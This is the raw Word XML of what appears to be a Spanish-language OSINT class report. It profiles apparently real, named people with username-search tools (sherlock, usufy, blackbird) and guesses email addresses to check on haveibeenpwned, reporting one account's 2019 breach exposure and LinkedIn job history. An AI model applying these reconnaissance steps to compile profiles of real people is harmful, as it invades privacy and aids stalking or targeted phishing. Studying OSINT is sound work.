        <w:p w14:paraId="6C741016" w14:textId="3B9A203E" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="00E341B1">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="22D3B4EE" w14:textId="006E7CD6" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="00E341B1">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>No aparece mucha más información relevante.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="29B7BD4A" w14:textId="08E5856C" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="00E341B1">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="683C2E6D" w14:textId="668F9D00" w:rsidR="000714B5" w:rsidRDefault="000714B5">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Ahora usaré Sherlock-&gt;</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2E86FF77" w14:textId="79F3785C" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="000714B5">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>El comando será ‘</w:t>
          </w:r>
          <w:r w:rsidRPr="008353EE">
            <w:rPr>
              <w:color w:val="44546A" w:themeColor="text2"/>
            </w:rPr>
            <w:t>sherlock bruceleban --verbose’</w:t>
          </w:r>
          <w:r>
            <w:t>:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="070B1AD1" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="000714B5">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="22E15F69" w14:textId="37A29B33" w:rsidR="00E341B1" w:rsidRDefault="000714B5" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:tab/>
          </w:r>
          <w:r w:rsidRPr="000714B5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4D8FED" wp14:editId="289001D2">
                <wp:extent cx="5400040" cy="263715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37155"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="7428B90F" w14:textId="595063DE" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="00E341B1">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="343230FF" w14:textId="02A8A3FA" w:rsidR="00C824E5" w:rsidRDefault="000714B5" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Analizaremos los resultados:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1AA77275" w14:textId="5F193AB8" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>En GitHub encontramos un perfil real:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="65EE8832" w14:textId="0AEBE0D3" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="161CBF65" w14:textId="1CE0D888" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="000714B5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="272ED7DE" wp14:editId="3363F5FE">
                <wp:extent cx="5400040" cy="5027930"/>
                <wp:effectExtent l="0" t="0" r="0" b="127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027930"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="78DFA947" w14:textId="376DFAC2" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1139C8F5" w14:textId="2E59EA05" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Aunque por desgracia no contiene información.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4A739AD5" w14:textId="5007AF20" w:rsidR="00A81834" w:rsidRDefault="00A81834" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="51D63EFB" w14:textId="7B373D7B" w:rsidR="00A81834" w:rsidRDefault="00A81834" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Lo mismo en GitLab:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="113E993D" w14:textId="20C67F15" w:rsidR="00A81834" w:rsidRDefault="00A81834" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00A81834">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2102886C" wp14:editId="63006243">
                <wp:extent cx="5400040" cy="5270500"/>
                <wp:effectExtent l="0" t="0" r="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270500"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A05FAD4" w14:textId="02F8BE4F" w:rsidR="00A81834" w:rsidRDefault="00A81834" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1BA988C2" w14:textId="35C15C0B" w:rsidR="00745A36" w:rsidRDefault="00745A36" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>En cuanto a las demás redes no puedo confirmar que sea el por qué no contienen información ni foto de perfil.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="76DFB541" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5" w:rsidP="000714B5">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="403C2301" w14:textId="30E74DB1" w:rsidR="000714B5" w:rsidRDefault="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Ahora con OsintFramework:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="349C4E93" w14:textId="77777777" w:rsidR="00F41B6F" w:rsidRDefault="00F41B6F" w:rsidP="00F41B6F">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="66FB879D" w14:textId="0878BBAB" w:rsidR="00EA27E9" w:rsidRDefault="00EA27E9" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>El comando será ‘</w:t>
          </w:r>
          <w:r w:rsidRPr="008353EE">
            <w:rPr>
              <w:color w:val="44546A" w:themeColor="text2"/>
            </w:rPr>
            <w:t>usufy -n bruceleban’</w:t>
          </w:r>
          <w:r>
            <w:t>:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1AC43F3A" w14:textId="3496AE90" w:rsidR="00EA27E9" w:rsidRDefault="00EA27E9" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00EA27E9">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="282B3151" wp14:editId="26BCD07A">
                <wp:extent cx="5400040" cy="2413635"/>
                <wp:effectExtent l="0" t="0" r="0" b="571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13635"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="13B3A6C7" w14:textId="6E11D950" w:rsidR="00EA27E9" w:rsidRDefault="00EA27E9" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3DCAB4AB" w14:textId="51F8EEA9" w:rsidR="00EA27E9" w:rsidRDefault="00EA27E9" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>Esto nos genera un archivo csv con información:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="55E8A45B" w14:textId="6F88AA64" w:rsidR="00EA27E9" w:rsidRDefault="00EA27E9" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00EA27E9">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="707CE702" wp14:editId="44403D9E">
                <wp:extent cx="5400040" cy="690435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6904355"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="68FDAFEB" w14:textId="6752B24B" w:rsidR="00EA27E9" w:rsidRDefault="00EA27E9" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6A8EE4F9" w14:textId="3EA26712" w:rsidR="00EA27E9" w:rsidRDefault="00EA27E9" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>Realmente no se consigue nada relevante, las redes sociales que se pueden verificar ya las tenemos.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7758E1F2" w14:textId="27E0FAE6" w:rsidR="003077BC" w:rsidRDefault="003077BC" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7D06184D" w14:textId="515FB2B2" w:rsidR="003077BC" w:rsidRDefault="003077BC" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Para saber si correo fue afectado por alguna brecha de seguridad voy usar la página: </w:t>
          </w:r>
          <w:hyperlink r:id="rId31" w:history="1">
            <w:r w:rsidRPr="004B2C78">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
              </w:rPr>
              <w:t>https://haveibeenpwned.com/</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:t xml:space="preserve">, puesto que no se su </w:t>
          </w:r>
          <w:r w:rsidR="000F5FC2">
            <w:t>correo,</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> pero si su nombre de usuario, voy a probar buscando en diferentes correos con ese nombre, y así encuentro esto:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="325FC95E" w14:textId="1DF4B324" w:rsidR="003077BC" w:rsidRDefault="003077BC" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="003077BC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A583DA" wp14:editId="1934E9A9">
                <wp:extent cx="5400040" cy="5275580"/>
                <wp:effectExtent l="0" t="0" r="0" b="127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275580"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="4F892F23" w14:textId="5CE2415B" w:rsidR="003077BC" w:rsidRDefault="003077BC" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6EF2329F" w14:textId="7000EDF8" w:rsidR="003077BC" w:rsidRDefault="003077BC" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>Su correo fue comprometido en febrero de 2019, por una brecha de seguridad en MongoDB.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6EB64012" w14:textId="60C4F1D7" w:rsidR="00340516" w:rsidRDefault="00340516" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7E7EB652" w14:textId="1FBA2A0C" w:rsidR="00340516" w:rsidRDefault="00340516">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Ahora hablaremos de su trabajo, según su LinkedIn, trabajo para Google desde 2006-2010, después en Bicada de VP, Engineering 2010-2012, para Smartsgett 2015-2021, y ahora en Rippling desde 2021.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="43EBCA74" w14:textId="04FAE275" w:rsidR="00340516" w:rsidRDefault="00340516" w:rsidP="00340516">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00340516">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FFD76C3" wp14:editId="494F5EF6">
                <wp:extent cx="5400040" cy="485902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859020"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="27CE42E0" w14:textId="2EE850D6" w:rsidR="00340516" w:rsidRDefault="00340516" w:rsidP="00340516">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2171E3D5" w14:textId="79C42737" w:rsidR="00340516" w:rsidRDefault="00340516" w:rsidP="00340516">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00340516">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="752171DF" wp14:editId="49C167F7">
                <wp:extent cx="5400040" cy="4858385"/>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858385"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="34A4FA36" w14:textId="381FCB1A" w:rsidR="003077BC" w:rsidRDefault="003077BC" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="36BF63FC" w14:textId="77777777" w:rsidR="003077BC" w:rsidRDefault="003077BC" w:rsidP="00EA27E9">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6C4BBADA" w14:textId="77777777" w:rsidR="00C824E5" w:rsidRPr="00C824E5" w:rsidRDefault="00C824E5" w:rsidP="00C824E5"/>
        <w:p w14:paraId="594A861F" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="28575AD6" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="73D180A5" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="2B4C7B9B" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="0A079CC0" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="05DFB59D" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="27EF44FB" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="31C7C8C6" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="12B9D474" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="7DFD4FAB" w14:textId="77777777" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="1605D2A8" w14:textId="3A592A4B" w:rsidR="000714B5" w:rsidRDefault="00531973">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="24"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="34" w:name="_Toc128034145"/>
          <w:r>
            <w:rPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:t>Mugdha Bendre</w:t>
          </w:r>
          <w:r w:rsidR="00EE0ECE">
            <w:rPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            </w:rPr>
            <w:t xml:space="preserve"> -&gt;</w:t>
          </w:r>
          <w:bookmarkEnd w:id="34"/>
          <w:r w:rsidR="00EE0ECE">
            <w:rPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5FBDE0DB" w14:textId="7FBF08CA" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="5EC12C16" w14:textId="37798816" w:rsidR="00531973" w:rsidRDefault="00531973" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Buscando su nombre en Google su perfil de LinkedIn:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6A794EF3" w14:textId="4AD6A86D" w:rsidR="00531973" w:rsidRDefault="00531973" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="280849DF" w14:textId="4C668F54" w:rsidR="00531973" w:rsidRDefault="00531973" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00531973">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76126363" wp14:editId="68943F85">
                <wp:extent cx="5400040" cy="501269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012690"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="15957378" w14:textId="217B6FED" w:rsidR="00531973" w:rsidRDefault="00531973" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1781ACD2" w14:textId="19B3C541" w:rsidR="00531973" w:rsidRDefault="00531973" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Y ahora su nombre de usuario:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="20A2FB33" w14:textId="278B89ED" w:rsidR="00531973" w:rsidRDefault="00531973" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2F371DFE" w14:textId="701F7664" w:rsidR="00531973" w:rsidRDefault="00531973" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00531973">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="020DCACD" wp14:editId="4C5E8CBD">
                <wp:extent cx="5400040" cy="5292725"/>
                <wp:effectExtent l="0" t="0" r="0" b="31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292725"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="4DD899A5" w14:textId="098B1C1F" w:rsidR="00531973" w:rsidRDefault="00531973" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="38C2882F" w14:textId="1D261166" w:rsidR="00531973" w:rsidRDefault="0028393C" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Con  este nombre realizaremos varias búsquedas:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="58763AB0" w14:textId="4AB65A76" w:rsidR="0028393C" w:rsidRDefault="0028393C" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="50B9499E" w14:textId="2C50B5A7" w:rsidR="0028393C" w:rsidRDefault="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Con la aplicación blackbird:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2F559A3E" w14:textId="7B13C3C2" w:rsidR="0028393C" w:rsidRDefault="0028393C" w:rsidP="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>El comando que tendremos que usar será este  ‘</w:t>
          </w:r>
          <w:r w:rsidRPr="008353EE">
            <w:rPr>
              <w:color w:val="44546A" w:themeColor="text2"/>
            </w:rPr>
            <w:t>python3 blackbird.py --web</w:t>
          </w:r>
          <w:r>
            <w:t>’, que nos creará un servidor web:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4049E03D" w14:textId="6D2C5A40" w:rsidR="0028393C" w:rsidRDefault="0028393C" w:rsidP="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="598F3E23" w14:textId="7721E77B" w:rsidR="0028393C" w:rsidRDefault="0028393C" w:rsidP="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="0028393C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="316EB983" wp14:editId="2145357E">
                <wp:extent cx="5400040" cy="5411470"/>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411470"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="6ABA492D" w14:textId="079627FB" w:rsidR="0028393C" w:rsidRDefault="0028393C" w:rsidP="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2688797D" w14:textId="63FA5014" w:rsidR="0028393C" w:rsidRDefault="0028393C" w:rsidP="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>Estos son los posibles perfiles que encuentra:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="14DF0C2D" w14:textId="69AC42A9" w:rsidR="0028393C" w:rsidRDefault="0028393C" w:rsidP="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="0028393C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2298FD6E" wp14:editId="05DA86D3">
                <wp:extent cx="5400040" cy="541147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411470"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="10864D86" w14:textId="0B58D863" w:rsidR="00F13C31" w:rsidRDefault="00F13C31" w:rsidP="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6A72051C" w14:textId="41D5D8BD" w:rsidR="00F13C31" w:rsidRDefault="00F13C31" w:rsidP="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>No podemos saber si alguno de estos perfiles le pertenecen.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="43E88F85" w14:textId="4BD6B862" w:rsidR="00613F8A" w:rsidRDefault="00613F8A" w:rsidP="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="076C63FE" w14:textId="0F09887C" w:rsidR="00613F8A" w:rsidRDefault="00613F8A">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Ahora usaré Sherlock:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7BC5B384" w14:textId="2A9CB61F" w:rsidR="00613F8A" w:rsidRDefault="00613F8A" w:rsidP="00613F8A">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00613F8A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="733FC14A" wp14:editId="71DB4B5E">
                <wp:extent cx="5400040" cy="4258945"/>
                <wp:effectExtent l="0" t="0" r="0" b="825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258945"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="59037F21" w14:textId="77777777" w:rsidR="00613F8A" w:rsidRDefault="00613F8A" w:rsidP="00613F8A">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
